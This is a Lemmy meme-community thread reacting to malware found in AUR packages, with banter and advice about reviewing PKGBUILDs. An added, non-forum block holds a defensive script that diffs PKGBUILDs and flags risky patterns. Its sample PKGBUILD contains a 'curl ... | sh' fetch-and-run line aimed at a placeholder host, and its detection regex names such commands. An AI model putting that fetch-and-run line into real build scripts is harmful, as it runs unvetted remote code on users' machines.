this post was submitted on 15 Jun 2026
486 points (97.8% liked)

linuxmemes


Hint: :q!


Community rules

1. Follow the site-wide rules

2. Be civil
  • Understand the difference between a joke and an insult.
  • Do not harass or attack users for any reason. This includes using blanket terms, like "every user of thing".
  • Don't get baited into back-and-forth insults. We are not animals.
  • Leave remarks of "peasantry" to the PCMR community. If you dislike an OS/service/application, attack the thing you dislike, not the individuals who use it. Some people may not have a choice.
  • Bigotry will not be tolerated.

3. Post Linux-related content
  • Including Unix and BSD.
  • Non-Linux content is acceptable as long as it makes a reference to Linux. For example, the poorly made mockery of sudo in Windows.
  • No porn, no politics, no trolling or ragebaiting.
  • Don't come looking for advice, this is not the right community.

4. No recent reposts
  • Everybody uses Arch btw, can't quit Vim, <loves/tolerates/hates> systemd, and wants to interject for a moment. You can stop now.

5. 🇬🇧 Language/язык/Sprache
  • This is primarily an English-speaking community. 🇬🇧🇦🇺🇺🇸
  • Comments written in other languages are allowed.
  • The substance of a post should be comprehensible for people who only speak English.
  • Titles and post bodies written in other languages will be allowed, but only as long as the above rule is observed.

6. (NEW!) Regarding public figures
  • We all have our opinions, and certain public figures can be divisive. Keep in mind that this is a community for memes and light-hearted fun, not for airing grievances or leveling accusations.
  • Keep discussions polite and free of disparagement.
  • We are never in possession of all of the facts. Defamatory comments will not be tolerated.
  • Discussions that get too heated will be locked and offending comments removed.

    Please report posts and comments that break these rules!


    Important: never execute code or follow advice that you don't understand or can't verify, especially here. The word of the day is credibility. This is a meme community -- even the most helpful comments might just be shitposts that can damage your system. Be aware, be smart, don't remove France.

    founded 3 years ago
    top 50 comments
    [–] gerryflap@feddit.nl 1 points 6 minutes ago

    I learnt a lesson yeah. It looks like I got away, there's no rootkit, I found nothing weird running, I don't have npm installed, and up until now it doesn't seem like the packages I had installed were compromised. But I had way more AUR packages installed than I was aware of. And I was just updating them without really caring about the PKGBUILD, I have better things to do. Multiple packages were outdated crap that shouldn't have been there anymore.

    I was careless and took too much risk. I reduced the installed AUR packages to a minimum, and from now on I will verify the PKGBUILDs on every update. Maybe Arch isn't really what I need. I'm on the LTS kernel and I no longer really use the AUR. But switching will be a huge hassle and this setup will work well from here on out, so I'll stick to it for now.

    ClamAV users, how's it going?

    [–] Ghoelian@piefed.social 2 points 47 minutes ago (2 children)

    So what are good antivirus options for Linux? Is it still pretty much just ClamAV?

    [–] Ghoelian@piefed.social 2 points 42 minutes ago

    One thread I found from 2 years ago where someone asked for the same thing, a lot of the replies are just "you don't need antivirus on Linux" lmao

    [–] Johanno@lemmy.dbzer0.com 1 points 26 minutes ago

    Our company uses eset https://www.eset.com/us/home/antivirus/

    But afaik it costs money to really work.

    But your brain should be the best antivirus you have.

    [–] Shanmugha@lemmy.world 4 points 1 hour ago

    I am at "no fucking yays and the bunch, check the package create/update dates, read PKGBUILD, only update when necessary". Has served me well so far

    [–] HisAssholiness@lemmy.ml 6 points 4 hours ago

    Arch users just randomly dropping "I use Arch btw" everywhere, it was only a matter of time.

    [–] Honytawk@discuss.tchncs.de 13 points 7 hours ago (1 children)

    And you believe that makes you safe?

    Shit like this is a blemish on the Linux community.

    [–] ornery_chemist@mander.xyz 8 points 7 hours ago (2 children)

    I was on arch as a vestige from my school days, having never quite found the time to switch to something more stable. When I saw the news over the weekend, I checked and found 1 would-be-infected package on my machine that was thankfully months out of date. I'm well past the point of wanting to examine PKGBUILDs every time (hence the out of date package). But, instead of just removing AUR packages and sticking to arch repos, I decided to sweep up the technical debt by wiping and installing Fedora. I'm liking it so far, minus the absolute pain in the ass that is Nvidia on Linux. Fuck academics and their insistence on writing everything targeting CUDA; otherwise, I'd have saved a good bit of money a few years ago with a much more compatible AMD card.

    [–] insomniac_lemon@lemmy.cafe 2 points 2 hours ago

    Have you looked into drop-in (ZLUDA) or recompile (SCALE, chipStar) things? Though they may not have been helpful with the years gone by (and may each have their own pros/cons).

    I'm still using a 1050Ti (and legacy driver shifting to AUR did block me from updating), value doesn't seem great and not going to buy something used from eBay. So that still complicates things for me.

    Distro-wise I probably want something slower than Arch but not sure about point releases. And I am hoping for something that does updates in a way more friendly to slower internet (giving less update friction), but I suspect it doesn't exist. Some things (OpenSUSE, NixOS) seem like they might be closer to I want but I have hangups about them (Patterns on SUSE and lack of videos for Slowroll, NixOS having multiple solutions for dynamically linked executables especially if I decide to stop using Steam directly).

    [–] Auth@lemmy.world -1 points 4 hours ago

    Isn't it just a single line command to get nvidia working?

    [–] Crashumbc@lemmy.world 42 points 10 hours ago (1 children)

    The more popular Linux becomes, the less true this will be.

    [–] nsh@lemmy.nz 5 points 3 hours ago

    Avoid success at all costs - Simon Peyton Jones

    [–] ILikeBoobies@lemmy.ca 3 points 5 hours ago* (last edited 5 hours ago)

    Use the AUR, have an antivirus, no infected packages. However I was thinking of switching to https://chimera-linux.org/ before the infected packages went out.

    [–] Kolanaki@pawb.social 4 points 6 hours ago

    Custom OS that no one else has access to. It might be full of exploits and bugs, but only you would know that. 😉

    [–] Speiser0@feddit.org 3 points 7 hours ago

    My eyes, I look at AUR packages before building them, as any real arch user does. AFAIK, antivirus programs would do the same to compiled binaries, looking for suspicious things and blocking if it finds something.

    [–] irelephant@lemmy.dbzer0.com 6 points 9 hours ago (1 children)

    Security through insecurity

    [–] irelephant@lemmy.dbzer0.com 3 points 9 hours ago

    Though, Linux being open source helps a lot

    [–] Don_alForno@feddit.org 15 points 12 hours ago

    Also, an ad blocker.

    [–] pleb_maximus@piefed.zip 5 points 10 hours ago

    Hi there 👋

    Don't have installed much from the AUR though.

    [–] thagoat@lemmy.dbzer0.com 90 points 17 hours ago (2 children)

    Never trust an NPM library

    [–] redsand@infosec.pub 13 points 13 hours ago (1 children)
    [–] HeHoXa@lemmy.zip 8 points 11 hours ago* (last edited 11 hours ago)

    ... technical name for glory hole

    OR

    Your mom's a fuck node

    [–] rozodru@piefed.world 8 points 12 hours ago

    bu-but so many libraries need funding!

    [–] DmMacniel@feddit.org 75 points 16 hours ago* (last edited 16 hours ago) (4 children)

    Linux Users: haha those silly windows users, always searching the web for their software and getting viruses.
    Linux Users: oh no I got malware by searching the AUR!

    [–] riot@fedia.io 7 points 11 hours ago

    AUR naur! for all my Australians out there.

    [–] rtxn@lemmy.world 32 points 15 hours ago* (last edited 15 hours ago) (2 children)

    The AUR is still safer. One, it is at least minimally moderated. If a malicious package is detected, it can be reported and removed. Two, the installer is usually not just a black box executable. Three, most of the build and runtime dependencies are from the official Arch repos, which provides some protection against supply chain attacks. For Windows installers, you have to trust the distributor to bundle clean DLLs (for that matter, the same applies to AppImages).

    But if it starts downloading anything from NPM... ^C and run.

    [–] 30p87@feddit.org 18 points 15 hours ago (2 children)

    The most unsafe factor of the AUR is AUR helpers and their goal to dumb everything down and streamline the process as if the AUR were an official repo

    [–] CubitOom@infosec.pub 6 points 11 hours ago (1 children)

    I'm not entirely sure I agree, I think the issue is with default settings.

    Like you could use both yay and paru to diff the PKGBUILD of the most recent update and then read it, and then approve each. And I think that's pretty helpful. But you could also just blindly accept the update with the right config or flag and that is not a good practice.

    [–] bitfucker@programming.dev 1 points 38 minutes ago

    Yeah, use and promote aurto instead. They require you to trust the maintainer and would remove the package from the local repo if the maintainer is changed
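The diff-then-read-then-approve step CubitOom describes above, and the "read PKGBUILD, only update when necessary" habit Shanmugha mentions further up, as a small added shell example. This is not code from the thread, nor from yay, paru or aurto. The two PKGBUILD texts are constructed samples for a hypothetical package "example-tool", and the list of risky patterns is an assumed starting point, not a complete detector.

```shell
#!/bin/sh
# Added example: review a freshly fetched PKGBUILD against the copy you last
# read, before letting an AUR helper build it. Not code from yay/paru/aurto.
# Both PKGBUILD texts are constructed samples for a hypothetical package.

REVIEWED_PKGBUILD='pkgname=example-tool
pkgver=1.2.0
pkgrel=1
source=("https://example.invalid/example-tool-${pkgver}.tar.gz")
sha256sums=("1111111111111111111111111111111111111111111111111111111111111111")
build() {
  cd "$srcdir/example-tool-$pkgver"
  make
}'

NEW_PKGBUILD='pkgname=example-tool
pkgver=1.2.1
pkgrel=1
source=("https://example.invalid/example-tool-${pkgver}.tar.gz")
sha256sums=("SKIP")
build() {
  cd "$srcdir/example-tool-$pkgver"
  npm install --prefix "$srcdir/deps"
  curl -fsSL https://example.invalid/setup.sh | sh
  make
}'

# Assumed starting list of patterns worth a human read: pulling code from a
# package registry at build time, piping a download straight into a shell,
# and checksums set to SKIP (which turns off source verification).
RISKY_PATTERNS='npm (install|ci|exec)|npx |pip install|(curl|wget) .*[|] *(ba)?sh|sums=\("?SKIP'

# Unified diff of the reviewed text against the new one. diff exits 1 when
# the inputs differ, so the status is normalised for callers under set -e.
pkgbuild_diff() {
  pd_old=$(mktemp) && pd_new=$(mktemp)
  printf '%s\n' "$1" > "$pd_old"
  printf '%s\n' "$2" > "$pd_new"
  diff -u -L reviewed -L new "$pd_old" "$pd_new" || true
  rm -f "$pd_old" "$pd_new"
}

# Numbered lines of a PKGBUILD that match RISKY_PATTERNS (empty when clean).
flag_risky_lines() {
  printf '%s\n' "$1" | grep -n -E "$RISKY_PATTERNS" || true
}

# Exit 0 when the update adds no risky line that the reviewed version lacked,
# 1 when it does. Lines already present and previously read are not re-flagged.
review_pkgbuild() {
  rp_added=$(pkgbuild_diff "$1" "$2" | grep '^+' | grep -v '^+++' \
             | grep -c -E "$RISKY_PATTERNS") || true
  [ "${rp_added:-0}" -eq 0 ]
}

# Stand-alone demo on the constructed samples.
pkgbuild_diff "$REVIEWED_PKGBUILD" "$NEW_PKGBUILD"
echo "--- lines to read before approving ---"
flag_risky_lines "$NEW_PKGBUILD"
if review_pkgbuild "$REVIEWED_PKGBUILD" "$NEW_PKGBUILD"; then
  echo "no new risky lines; read the diff, then build"
else
  echo "update introduces risky build steps; do not build until reviewed"
fi
```

The point of keeping the previously reviewed copy is that a helper's "show diff" prompt only helps if the baseline is something you actually read; the pattern list is there to pull the eye to the lines that matter (registry installs, piped downloads, disabled checksums), not to replace reading the whole file.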

    [–] panda_abyss@lemmy.ca 34 points 16 hours ago (1 children)

    Don’t worry, I found a package on npm to help!

    [–] Bishma@discuss.tchncs.de 38 points 15 hours ago* (last edited 15 hours ago) (6 children)

    I don't use Arch, BTW. So the biggest NPM threat vector on my machine is still VSCode.

    [–] yesman@lemmy.world 45 points 16 hours ago (2 children)

    Microslop is nervous now that Linux is popular enough to attack.

    [–] CubitOom@infosec.pub 34 points 15 hours ago (1 children)

    Linux has always been the bigger target. Even microslop uses linux for its servers.

    [–] four@lemmy.zip 21 points 14 hours ago (1 children)

    I'm gonna assume that their servers are not installing stuff from AUR though

    [–] Goodlucksil@lemmy.dbzer0.com 9 points 12 hours ago

    I would hope so too

    [–] mintiefresh@piefed.ca 45 points 16 hours ago

    btw, I use malware

    [–] altphoto@lemmy.today 11 points 12 hours ago

    With the old package managers safety was simple...trust the developers, use their packages. 10000 downloads? Easy! 1 download.... 🤔 Maybe skip for now.

    Now with executables like mac and Windows it's easier to sneak something in. You still rely on trust. But now you've got AI in the game muddying the waters.

    [–] avidamoeba@lemmy.ca 1 points 8 hours ago* (last edited 8 hours ago)

    The unsandboxed package model was only ever safe in its original conception - with organizationally trusted and cryptographically enforced maintainer model. Remove the maintainer/developer trust requirement and you need a sandbox in order to prevent malware having root access on your system. Tis why mobile apps were sandboxed on Android and iOS from the get go.

    [–] istdaslol@feddit.org 39 points 17 hours ago (3 children)

    Inverted security by obscurity

    [–] CubitOom@infosec.pub 29 points 17 hours ago* (last edited 17 hours ago) (15 children)

    I avoid orphaned packages and I wait a few days before I type yay
